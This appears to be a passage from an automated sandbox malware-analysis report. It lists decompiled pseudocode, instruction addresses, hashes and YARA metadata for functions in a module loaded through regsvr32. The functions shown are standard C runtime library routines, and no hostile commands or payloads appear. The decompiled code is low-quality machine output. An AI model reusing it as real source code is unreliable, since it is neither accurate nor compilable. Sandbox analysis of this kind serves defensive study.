				_v72 = 0;
				_t158 = _a24;
				if ( *((intOrPtr*)(_t158 + 4)) == 0) goto 0x52475639;
				_t89 = E00007FFA7FFA5246E680(_t88, _t158);
				_v56 = _t158 + _a24[1];
				goto 0x52475642;
				_v56 = 0;
				if (_v56 == 0) goto 0x524756aa;
				_t160 = _a24;
				if ( *((intOrPtr*)(_t160 + 4)) == 0) goto 0x52475673;
				E00007FFA7FFA5246E680(_t89, _t160);
				_v48 = _t160 + _a24[1];
				goto 0x5247567c;
				_v48 = 0;
				if ( *((char*)(_v48 + 0x10)) == 0) goto 0x524756aa;
				if (_a24[2] != 0) goto 0x524756b1;
				if (( *_a24 & 0x80000000) != 0) goto 0x524756b1;
				goto 0x52475966;
				if (( *_a24 & 0x80000000) == 0) goto 0x524756d0;
				_v64 = _a16;
				goto 0x524756e9;
				_v64 = _a24[2] +  *_a16;
				if (( *_a24 & 0x00000008) == 0) goto 0x52475765;
				if (E00007FFA7FFA5247D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0x5247575b;
				if (E00007FFA7FFA5247D2C0(1, _v64) == 0) goto 0x5247575b;
				 *_v64 =  *((intOrPtr*)(_a8 + 0x28));
				_t175 = _v64;
				E00007FFA7FFA52475B30(_t100,  *_t175,  &(_a32[2]));
				 *_v64 = _t175;
				goto 0x52475760;
				E00007FFA7FFA5246CF80(_t175);
				goto 0x5247595a;
				if (( *_a32 & 0x00000001) == 0) goto 0x52475813;
				if (E00007FFA7FFA5247D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0x52475809;
				if (E00007FFA7FFA5247D2C0(1, _v64) == 0) goto 0x52475809;
				_t107 = E00007FFA7FFA5246C410(__ecx, E00007FFA7FFA5247D2C0(1, _v64), _v64,  *((intOrPtr*)(_a8 + 0x28)), _a32[5]);
				if (_a32[5] != 8) goto 0x52475807;
				if ( *_v64 == 0) goto 0x52475807;
				_t186 = _v64;
				E00007FFA7FFA52475B30(_t107,  *_t186,  &(_a32[2]));
				 *_v64 = _t186;
				goto 0x5247580e;
				_t109 = E00007FFA7FFA5246CF80(_t186);
				goto 0x5247595a;
				_t187 = _a32;
				if ( *((intOrPtr*)(_t187 + 0x18)) == 0) goto 0x5247583c;
				E00007FFA7FFA5246E6A0(_t109, _t187);
				_v40 = _t187 + _a32[6];
				goto 0x52475845;
				_v40 = 0;
				if (_v40 != 0) goto 0x524758c6;
				if (E00007FFA7FFA5247D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0x524758bc;
				if (E00007FFA7FFA5247D2C0(1, _v64) == 0) goto 0x524758bc;
				_t191 = _a32[5];
				_v32 = _a32[5];
				E00007FFA7FFA52475B30(_t112,  *((intOrPtr*)(_a8 + 0x28)),  &(_a32[2]));
				E00007FFA7FFA5246C410(__ecx, E00007FFA7FFA5247D2C0(1, _v64), _v64, _a32[5], _v32);
				goto 0x524758c1;
				E00007FFA7FFA5246CF80(_t191);
				goto 0x5247595a;
				if (E00007FFA7FFA5247D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0x52475955;
				if (E00007FFA7FFA5247D2C0(1, _v64) == 0) goto 0x52475955;
				_t193 = _a32;
				if ( *((intOrPtr*)(_t193 + 0x18)) == 0) goto 0x52475919;
				E00007FFA7FFA5246E6A0(_t117, _t193);
				_v24 = _t193 + _a32[6];
				goto 0x52475922;
				_v24 = 0;
				if (E00007FFA7FFA5247D2F0(_v24) == 0) goto 0x52475955;
				_t195 = _a32;
				if (( *_a32 & 0x00000004) == 0) goto 0x5247594b;
				_v72 = 2;
				goto 0x52475953;
				_v72 = 1;
				goto 0x5247595a;
				E00007FFA7FFA5246CF80(_a32);
				E00007FFA7FFA5246CF50(_t195);
				return _v72;
			}




















                                                                                0x7ffa524755f0
                                                                                0x7ffa524755f5
                                                                                0x7ffa524755fa
                                                                                0x7ffa524755ff
                                                                                0x7ffa52475608
                                                                                0x7ffa52475610
                                                                                0x7ffa5247561c
                                                                                0x7ffa5247561e
                                                                                0x7ffa52475632
                                                                                0x7ffa52475637
                                                                                0x7ffa52475639
                                                                                0x7ffa52475648
                                                                                0x7ffa5247564a
                                                                                0x7ffa52475656
                                                                                0x7ffa52475658
                                                                                0x7ffa5247566c
                                                                                0x7ffa52475671
                                                                                0x7ffa52475673
                                                                                0x7ffa52475687
                                                                                0x7ffa52475695
                                                                                0x7ffa524756a8
                                                                                0x7ffa524756ac
                                                                                0x7ffa524756c2
                                                                                0x7ffa524756c9
                                                                                0x7ffa524756ce
                                                                                0x7ffa524756e4
                                                                                0x7ffa524756f8
                                                                                0x7ffa5247570f
                                                                                0x7ffa52475722
                                                                                0x7ffa52475732
                                                                                0x7ffa52475744
                                                                                0x7ffa5247574c
                                                                                0x7ffa52475756
                                                                                0x7ffa52475759
                                                                                0x7ffa5247575b
                                                                                0x7ffa52475760
                                                                                0x7ffa52475774
                                                                                0x7ffa5247578f
                                                                                0x7ffa524757a2
                                                                                0x7ffa524757c1
                                                                                0x7ffa524757d6
                                                                                0x7ffa524757e1
                                                                                0x7ffa524757f2
                                                                                0x7ffa524757fa
                                                                                0x7ffa52475804
                                                                                0x7ffa52475807
                                                                                0x7ffa52475809
                                                                                0x7ffa5247580e
                                                                                0x7ffa52475813
                                                                                0x7ffa5247581f
                                                                                0x7ffa52475821
                                                                                0x7ffa52475835
                                                                                0x7ffa5247583a
                                                                                0x7ffa5247583c
                                                                                0x7ffa5247584b
                                                                                0x7ffa52475862
                                                                                0x7ffa52475875
                                                                                0x7ffa5247587f
                                                                                0x7ffa52475883
                                                                                0x7ffa524758a0
                                                                                0x7ffa524758b5
                                                                                0x7ffa524758ba
                                                                                0x7ffa524758bc
                                                                                0x7ffa524758c1
                                                                                0x7ffa524758db
                                                                                0x7ffa524758ee
                                                                                0x7ffa524758f0
                                                                                0x7ffa524758fc
                                                                                0x7ffa524758fe
                                                                                0x7ffa52475912
                                                                                0x7ffa52475917
                                                                                0x7ffa52475919
                                                                                0x7ffa5247592e
                                                                                0x7ffa52475930
                                                                                0x7ffa5247593f
                                                                                0x7ffa52475941
                                                                                0x7ffa52475949
                                                                                0x7ffa5247594b
                                                                                0x7ffa52475953
                                                                                0x7ffa52475955
                                                                                0x7ffa5247595c
                                                                                0x7ffa5247596a

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Validate$Read$Pointer_inconsistency$Adjust$DecodeExecuteterminate
                                                                                • String ID:
                                                                                • API String ID: 801082872-0
                                                                                • Opcode ID: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                                                • Instruction ID: 1b29972ecb2c688b3f8b562ab704c6ad06bd0669882e8859774c4aed708ff78a
                                                                                • Opcode Fuzzy Hash: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                                                • Instruction Fuzzy Hash: FCA10F2260CA8182EB609B15E85037A67F0FBC5B94F5C8131DE9D8B7A9DFBCD456CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52478D00 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 287COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtow_s
                                                                                • API String ID: 2123368286-1993839260
                                                                                • Opcode ID: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                                                • Instruction ID: 866cd50600b7e4bff5c328e651add53c8574788b18449263942612fab636e604
                                                                                • Opcode Fuzzy Hash: f8a5afe18f34840ee0df28905467ae8a93c47803c1f8068a44ba45b34dbb5592
                                                                                • Instruction Fuzzy Hash: 3AE15F36A1C7858AE7609B14E84436AB3F1FB86344F188135E6AD87B9CDFBDE445CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52477030 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 282COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtoa_s
                                                                                • API String ID: 2123368286-1853640030
                                                                                • Opcode ID: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                                                • Instruction ID: 166c8eea9f4d2cc41b6a63c6259d84e5dccc3b9e359130751f8d7404d9493f43
                                                                                • Opcode Fuzzy Hash: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                                                • Instruction Fuzzy Hash: 2CE13832A1C6868AE7608B14E85436BB7F1FB86344F988035E6AD47B98DFBDD445CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247E6C6 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 22%
                                                                                			E00007FFA7FFA5247E6C6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
				signed int _t224;
				signed char _t229;
				void* _t260;
				intOrPtr _t268;
				signed int _t342;
				signed int _t343;
				signed long long _t346;
				intOrPtr* _t365;
				intOrPtr* _t370;
				signed long long _t400;

				_t342 = __rax;
				_a80 = _a80 | 0x00000040;
				_a72 = 0xa;
				_a72 = 0xa;
				_a116 = 0x10;
				asm("bts eax, 0xf");
				_a1220 = 7;
				_a1220 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0x5247e74d;
				_a84 = 0x30;
				_a86 = _a1220 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0x5247e770;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0x5247e797;
				E00007FFA7FFA52471EA0( &_a1560);
				_a1304 = _t342;
				goto 0x5247e844;
				if ((_a80 & 0x00001000) == 0) goto 0x5247e7be;
				E00007FFA7FFA52471EA0( &_a1560);
				_a1304 = _t342;
				goto 0x5247e844;
				if ((_a80 & 0x00000020) == 0) goto 0x5247e809;
				if ((_a80 & 0x00000040) == 0) goto 0x5247e7ef;
				_t343 = E00007FFA7FFA52471E40( &_a1560);
				_a1304 = _t343;
				goto 0x5247e807;
				E00007FFA7FFA52471E40( &_a1560);
				_a1304 = _t343;
				goto 0x5247e844;
				if ((_a80 & 0x00000040) == 0) goto 0x5247e82d;
				E00007FFA7FFA52471E40( &_a1560);
				_a1304 = _t343;
				goto 0x5247e844;
				E00007FFA7FFA52471E40( &_a1560);
				_a1304 = _t343;
				if ((_a80 & 0x00000040) == 0) goto 0x5247e87b;
				if (_a1304 >= 0) goto 0x5247e87b;
				_a1312 =  ~_a1304;
				asm("bts eax, 0x8");
				goto 0x5247e88b;
				_t346 = _a1304;
				_a1312 = _t346;
				if ((_a80 & 0x00008000) != 0) goto 0x5247e8c0;
				if ((_a80 & 0x00001000) != 0) goto 0x5247e8c0;
				_a1312 = _a1312 & _t346;
				if (_a116 >= 0) goto 0x5247e8d1;
				_a116 = 1;
				goto 0x5247e8ee;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0x5247e8ee;
				_a116 = 0x200;
				if (_a1312 != 0) goto 0x5247e901;
				_a92 = 0;
				_a64 =  &_a687;
				_t224 = _a116;
				_a116 = _a116 - 1;
				if (_t224 > 0) goto 0x5247e92f;
				if (_a1312 == 0) goto 0x5247e9cc;
				_a1480 = _a72;
				_a1296 = _t224 / _a1480 + 0x30;
				_a1488 = _a72;
				if (_a1296 - 0x39 <= 0) goto 0x5247e9ab;
				_t229 = _a1296 + _a1220;
				_a1296 = _t229;
				 *_a64 = _a1296 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0x5247e90e;
				_a104 = _t229;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0x5247ea2a;
				if (_a104 == 0) goto 0x5247ea0b;
				if ( *_a64 == 0x30) goto 0x5247ea2a;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0x5247ec7c;
				if ((_a80 & 0x00000040) == 0) goto 0x5247ea9d;
				if ((_a80 & 0x00000100) == 0) goto 0x5247ea61;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0x5247ea9d;
				if ((_a80 & 0x00000001) == 0) goto 0x5247ea80;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0x5247ea9d;
				if ((_a80 & 0x00000002) == 0) goto 0x5247ea9d;
				_a84 = 0x20;
				_a92 = 1;
				_a1320 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0x5247eadf;
				E00007FFA7FFA5247EEC0(0x20, _a1320, _a1536,  &_a1200);
				E00007FFA7FFA5247EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
				if ((_a80 & 0x00000008) == 0) goto 0x5247eb33;
				if ((_a80 & 0x00000004) != 0) goto 0x5247eb33;
				E00007FFA7FFA5247EEC0(0x30, _a1320, _a1536,  &_a1200);
				if (_a76 != 0) goto 0x5247ec29;
				if (_a104 <= 0) goto 0x5247ec29;
				_t365 = _a64;
				_a1328 = _t365;
				_a1336 = _a104;
				_a1336 = _a1336 - 1;
				if (_a1336 <= 0) goto 0x5247ec27;
				_t260 = E00007FFA7FFA52466840(_a1336,  &_a120);
				_a1496 = _t365;
				E00007FFA7FFA52466840(_t260,  &_a120);
				_a1340 = E00007FFA7FFA5247F000( &_a1212, _a1328,  *((intOrPtr*)( *_t365 + 0x10c)), _a1496);
				if (_a1340 > 0) goto 0x5247ebe7;
				_a1200 = 0xffffffff;
				goto 0x5247ec27;
				E00007FFA7FFA5247EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
				_a1328 = _a1328 + _a1340;
				goto 0x5247eb61;
				goto 0x5247ec47;
				E00007FFA7FFA5247EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
				if (_a1200 < 0) goto 0x5247ec7c;
				if ((_a80 & 0x00000004) == 0) goto 0x5247ec7c;
				E00007FFA7FFA5247EEC0(0x20, _a1320, _a1536,  &_a1200);
				if (_a96 == 0) goto 0x5247ec9c;
				0x52465330();
				_a96 = 0;
				goto 0x5247da75;
				if (_a1216 == 0) goto 0x5247ecc2;
				if (_a1216 == 7) goto 0x5247ecc2;
				_a1504 = 0;
				goto 0x5247eccd;
				_a1504 = 1;
				_t268 = _a1504;
				_a1344 = _t268;
				if (_a1344 != 0) goto 0x5247ed13;
				_t370 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t370;
				r9d = 0;
				r8d = 0x8f5;
				0x5246b3b0();
				if (_t268 != 1) goto 0x5247ed13;
				asm("int3");
				if (_a1344 != 0) goto 0x5247ed6f;
				0x5246ab30();
				 *_t370 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E00007FFA7FFA5246BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a1376 = 0xffffffff;
				E00007FFA7FFA52466800( &_a120);
				goto 0x5247ed8e;
				_a1380 = _a1200;
				E00007FFA7FFA52466800( &_a120);
				return E00007FFA7FFA52463280(_a1380, 2, 2, _a1512 ^ _t400, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}













                                                                                0x7ffa5247e6c6
                                                                                0x7ffa5247e6cd
                                                                                0x7ffa5247e6d1
                                                                                0x7ffa5247e6de
                                                                                0x7ffa5247e6eb
                                                                                0x7ffa5247e6f7
                                                                                0x7ffa5247e6ff
                                                                                0x7ffa5247e70c
                                                                                0x7ffa5247e717
                                                                                0x7ffa5247e72a
                                                                                0x7ffa5247e731
                                                                                0x7ffa5247e740
                                                                                0x7ffa5247e745
                                                                                0x7ffa5247e74f
                                                                                0x7ffa5247e762
                                                                                0x7ffa5247e768
                                                                                0x7ffa5247e77b
                                                                                0x7ffa5247e785
                                                                                0x7ffa5247e78a
                                                                                0x7ffa5247e792
                                                                                0x7ffa5247e7a2
                                                                                0x7ffa5247e7ac
                                                                                0x7ffa5247e7b1
                                                                                0x7ffa5247e7b9
                                                                                0x7ffa5247e7c7
                                                                                0x7ffa5247e7d2
                                                                                0x7ffa5247e7e1
                                                                                0x7ffa5247e7e5
                                                                                0x7ffa5247e7ed
                                                                                0x7ffa5247e7f7
                                                                                0x7ffa5247e7ff
                                                                                0x7ffa5247e807
                                                                                0x7ffa5247e812
                                                                                0x7ffa5247e81c
                                                                                0x7ffa5247e823
                                                                                0x7ffa5247e82b
                                                                                0x7ffa5247e835
                                                                                0x7ffa5247e83c
                                                                                0x7ffa5247e84d
                                                                                0x7ffa5247e858
                                                                                0x7ffa5247e865
                                                                                0x7ffa5247e871
                                                                                0x7ffa5247e879
                                                                                0x7ffa5247e87b
                                                                                0x7ffa5247e883
                                                                                0x7ffa5247e896
                                                                                0x7ffa5247e8a3
                                                                                0x7ffa5247e8b8
                                                                                0x7ffa5247e8c5
                                                                                0x7ffa5247e8c7
                                                                                0x7ffa5247e8cf
                                                                                0x7ffa5247e8d8
                                                                                0x7ffa5247e8e4
                                                                                0x7ffa5247e8e6
                                                                                0x7ffa5247e8f7
                                                                                0x7ffa5247e8f9
                                                                                0x7ffa5247e909
                                                                                0x7ffa5247e90e
                                                                                0x7ffa5247e918
                                                                                0x7ffa5247e91e
                                                                                0x7ffa5247e929
                                                                                0x7ffa5247e934
                                                                                0x7ffa5247e957
                                                                                0x7ffa5247e963
                                                                                0x7ffa5247e990
                                                                                0x7ffa5247e9a2
                                                                                0x7ffa5247e9a4
                                                                                0x7ffa5247e9b8
                                                                                0x7ffa5247e9c2
                                                                                0x7ffa5247e9c7
                                                                                0x7ffa5247e9d9
                                                                                0x7ffa5247e9e5
                                                                                0x7ffa5247e9f5
                                                                                0x7ffa5247e9fc
                                                                                0x7ffa5247ea09
                                                                                0x7ffa5247ea13
                                                                                0x7ffa5247ea1d
                                                                                0x7ffa5247ea26
                                                                                0x7ffa5247ea2f
                                                                                0x7ffa5247ea3e
                                                                                0x7ffa5247ea4b
                                                                                0x7ffa5247ea52
                                                                                0x7ffa5247ea57
                                                                                0x7ffa5247ea5f
                                                                                0x7ffa5247ea6a
                                                                                0x7ffa5247ea71
                                                                                0x7ffa5247ea76
                                                                                0x7ffa5247ea7e
                                                                                0x7ffa5247ea89
                                                                                0x7ffa5247ea90
                                                                                0x7ffa5247ea95
                                                                                0x7ffa5247eaad
                                                                                0x7ffa5247eabd
                                                                                0x7ffa5247eada
                                                                                0x7ffa5247eaf8
                                                                                0x7ffa5247eb06
                                                                                0x7ffa5247eb11
                                                                                0x7ffa5247eb2e
                                                                                0x7ffa5247eb38
                                                                                0x7ffa5247eb43
                                                                                0x7ffa5247eb49
                                                                                0x7ffa5247eb4e
                                                                                0x7ffa5247eb5a
                                                                                0x7ffa5247eb71
                                                                                0x7ffa5247eb7a
                                                                                0x7ffa5247eb85
                                                                                0x7ffa5247eb8a
                                                                                0x7ffa5247eb97
                                                                                0x7ffa5247ebc9
                                                                                0x7ffa5247ebd8
                                                                                0x7ffa5247ebda
                                                                                0x7ffa5247ebe5
                                                                                0x7ffa5247ebff
                                                                                0x7ffa5247ec1a
                                                                                0x7ffa5247ec22
                                                                                0x7ffa5247ec27
                                                                                0x7ffa5247ec42
                                                                                0x7ffa5247ec4f
                                                                                0x7ffa5247ec5a
                                                                                0x7ffa5247ec77
                                                                                0x7ffa5247ec82
                                                                                0x7ffa5247ec8e
                                                                                0x7ffa5247ec93
                                                                                0x7ffa5247ec9c
                                                                                0x7ffa5247eca9
                                                                                0x7ffa5247ecb3
                                                                                0x7ffa5247ecb5
                                                                                0x7ffa5247ecc0
                                                                                0x7ffa5247ecc2
                                                                                0x7ffa5247eccd
                                                                                0x7ffa5247ecd4
                                                                                0x7ffa5247ece3
                                                                                0x7ffa5247ece5
                                                                                0x7ffa5247ecec
                                                                                0x7ffa5247ecf1
                                                                                0x7ffa5247ecf4
                                                                                0x7ffa5247ed06
                                                                                0x7ffa5247ed0e
                                                                                0x7ffa5247ed10
                                                                                0x7ffa5247ed1b
                                                                                0x7ffa5247ed1d
                                                                                0x7ffa5247ed22
                                                                                0x7ffa5247ed28
                                                                                0x7ffa5247ed31
                                                                                0x7ffa5247ed4c
                                                                                0x7ffa5247ed51
                                                                                0x7ffa5247ed61
                                                                                0x7ffa5247ed6d
                                                                                0x7ffa5247ed76
                                                                                0x7ffa5247ed82
                                                                                0x7ffa5247eda5

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: get_int64_arg
                                                                                • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 1967237116-1983305044
                                                                                • Opcode ID: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                                                • Instruction ID: 4e30cb9aee4ee74be79ad7fa1ba63d8de704a448df8b597507b9df2f34ead710
                                                                                • Opcode Fuzzy Hash: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                                                • Instruction Fuzzy Hash: 87F1E87260CAC58AE7748B15E8413ABB7F0EB86351F088135E69D87A99EFBCD441CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52472D80 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 310COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$wcscat_s
                                                                                • API String ID: 2123368286-3477667311
                                                                                • Opcode ID: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                                                • Instruction ID: d560db96166e12386591ffc35a33c891cdc1f21aaa13be5f4ae5e5f7508f529a
                                                                                • Opcode Fuzzy Hash: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                                                • Instruction Fuzzy Hash: D4F13D31A1CB8695EB708B14E85436A67F0FB86794F188135D6AE83B9CDFBCE045CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524769C0 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 303COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$strcat_s
                                                                                • API String ID: 2123368286-1420200500
                                                                                • Opcode ID: 0735035b45f8f7c7b818c7081b0ef0632545b94255aff591ce5d43235ef3c046
                                                                                • Instruction ID: 7c36ebe05dda8cbb749e13adc3fc733e268f3c7cc9117da9fbe08fc507bb2c2f
                                                                                • Opcode Fuzzy Hash: 0735035b45f8f7c7b818c7081b0ef0632545b94255aff591ce5d43235ef3c046
                                                                                • Instruction Fuzzy Hash: 64F13B31A1CB8699EB708B14E84436A67F1FB86754F188135D6AE43BACDFBCE045CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247C30D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 231COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
